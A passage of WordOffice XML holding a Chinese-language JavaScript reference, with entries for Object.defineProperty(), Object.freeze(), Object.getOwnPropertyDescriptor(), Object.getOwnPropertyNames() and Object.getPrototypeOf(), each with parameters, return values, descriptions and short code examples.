        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(o,name,desc)</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o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将在其上创建或配置属性的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将创建或配置的属性的名字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>desc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个属性描述符对象，描述要创建的新属性或对现有属性的修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>。</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w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>不是一个对象，或者指定属性不能创建（比如</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>不可扩展）或配置（比如该属性已经存在，并且不可配置）。关于可能导致这个函数抛出</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>的属性配置错误列表可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节。</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Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>使用属性描述符</w:t>
      </w:r>
      <w:r>
        <w:t>desc</w:t>
      </w:r>
      <w:r>
        <w:t>来创建或配置对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中名为</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。关于属性描述符对象的描述，可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>还不存在名为</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，则这个函数将简单地使用</w:t>
      </w:r>
      <w:r>
        <w:t>desc</w:t>
      </w:r>
      <w:r>
        <w:t>中指定的属性和值来创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>新的属性。对于</w:t>
      </w:r>
      <w:r>
        <w:t>desc</w:t>
      </w:r>
      <w:r>
        <w:t>中未指定的属性，对应的属性值将设置为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中一个已经存在的属性名，则</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>将通过改变它的值或属性来配置这个属性。在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>desc</w:t>
      </w:r>
      <w:r>
        <w:t>只需要包含要改变的属性，不包含的属性将不会改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意这不是在具体的对象上调用的方法，它是一个全局函数，必须传入一个对象。</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function constant(o,n,v){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个值为</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>的常量</w:t>
      </w:r>
      <w:r>
        <w:t>o.n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(o,n,{value:v</w:t>
      </w:r>
      <w:r>
        <w:t>,writable:false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:true,configurable:false});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Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.defineProperties()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="725" w:name="Object_freeze__"/>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="725"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个对象设置为不可改变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.freeze(o)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要冻结的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现在处于冻结状态的参数对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</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Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>设置为不可扩展（参阅</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>），同时就像</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>那样，将它的所有自有属性设置为不可配置。除此之外，它也将所有非继承的数据属性设置</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>为只读。这意味着不能向</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>添加新属性，同时已有的属性也不能设置或删除。冻结对象是一个永久性的操作，一旦冻结，就不能解冻。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>只设置数据属性的可写特性，那些有对应</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>函数的属性不会受到影响。还要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>Object.freeze()</w:t>
      </w:r>
      <w:r>
        <w:t>不会影响继承属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意这个方法不可以在具体的对象上调用，它是一个全局函数，必须传入一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.isFrozen()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.preventExtensions()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Object.seal()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="726" w:name="Object_getOwnPropertyDescriptor__"/>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="726"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>查询一个属性的特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor(o,name)</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lastRenderedPageBreak/>
        <w:t>待查询其属性特性的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>待查询的属性名（或数组元素的索</w:t>
      </w:r>
      <w:r>
        <w:t>引）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定对象指定属性的一个属性描述符对象，如果不存在指定属性则返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</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Object.getOwnPrepertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>返回指定对象指定属性的一个属性描述符。属性描述符是一个对象，描述该属性的特性和值。细节可参阅下面的小节。注意，这个方法不可以在具体的对象上调用，它是一个全局函数，必须传入一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性描述符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性描述符是一个普通的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象，描述某个属性的特性（有时也包括值）。有两种</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性。数据属性有一个值以及三个性质：可枚举性（</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable</w:t>
      </w:r>
      <w:r>
        <w:t>）、可写性（</w:t>
      </w:r>
      <w:r>
        <w:t>writable</w:t>
      </w:r>
      <w:r>
        <w:t>）以及可配置性（</w:t>
      </w:r>
      <w:r>
        <w:t>configurable</w:t>
      </w:r>
      <w:r>
        <w:t>）。访问器属性（</w:t>
      </w:r>
      <w:r>
        <w:t>accessor property</w:t>
      </w:r>
      <w:r>
        <w:t>）有一个</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，以及可枚举性和可配置性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数据属性的描述符类似这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>value:/*</w:t>
      </w:r>
      <w:r>
        <w:t>任意</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>writable:/*true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerabl</w:t>
      </w:r>
      <w:r>
        <w:t>e:/*true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>configurable:/*true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false*/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访问器属性的描述符类似这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get:/*function</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>：替换属性值</w:t>
      </w:r>
      <w:r>
        <w:t>*/,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>set:/*function</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>：替换可写性</w:t>
      </w:r>
      <w:r>
        <w:t>*/,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:/*true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false*/,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>configurable:/*true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false*/</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Object.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="727" w:name="Object_getOwnPropertyNames__"/>
      <w:r>
        <w:t>Object.getOwnPropertyNames()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="727"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回非</w:t>
      </w:r>
      <w:r>
        <w:t>继承属性的名字</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Object.getOwnPropertyNames(o)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一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的所有非继承属性的名字的数组，包括那些不可枚举的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getOwnPropertyNames()</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的所有非继承属性的名字的数组，包括那些不可枚举的属性。关于只返回可枚举属性的名字的方法可参考</w:t>
      </w:r>
      <w:r>
        <w:t>Objects.keys()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这个方法不可在对象上调用，它是一个全局函数，必须传入一个对象。</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Object.getOwnPropertyNames([])//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>["length"]:"length"</w:t>
      </w:r>
      <w:r>
        <w:t>不可枚举</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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Object.keys()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="728" w:name="Object_getPrototypeOf__"/>
      <w:r>
        <w:t>Object.getPrototypeOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="728"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个对象的原型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getPrototypeOf(o)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一个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的原型对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getPrototypeOf()</w:t>
      </w:r>
      <w:r>
        <w:t>返回它的参数的原型。注意这是一个全局函数，必须传入一个对象。它不是在对象上调用的方法。</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p={};//</w:t>
      </w:r>
      <w:r>
        <w:t>一个原始对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getPrototypeOf(p)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=Object.create(p)//</w:t>
      </w:r>
      <w:r>
        <w:t>一个继承自</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getPrototypeOf(o)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>p</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Object.create()</w:t>
      </w:r>
      <w:r>
        <w:t>、第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="729" w:name="Object_hasOwnProperty__"/>
      <w:r>
        <w:t>Object.hasOwnProperty()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="729"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>检查一个属性是否是继承的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
